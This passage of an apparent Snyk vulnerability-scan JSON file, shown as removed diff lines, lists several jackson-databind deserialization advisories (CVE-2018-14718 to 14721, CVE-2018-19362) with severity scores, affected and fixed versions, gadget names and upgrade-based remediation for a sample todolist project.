the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.92634", - "probability": "0.04626", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14718" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-645p-88qh-w398" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:07.540945Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:19:49Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:19:41Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:22.234808Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.195569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.84205", - "probability": "0.01052", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14720" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-x2w5-5m2g-7h5m" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:22.141403Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:20:17Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:19:17Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:33.930153Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", - "title": "GitHub Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.120318Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.85805", - "probability": "0.01269", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14719" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-4gq5-ch57-c2mg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:23:45.326350Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:22:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:22:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.823657Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "cvssV3BaseScore": 6.8, - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.565013Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.85710", - "probability": "0.01257", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14721" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9mxf-g3x6-wv74" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:25:40.161831Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:24:46Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:24:39Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.774444Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.690019Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release 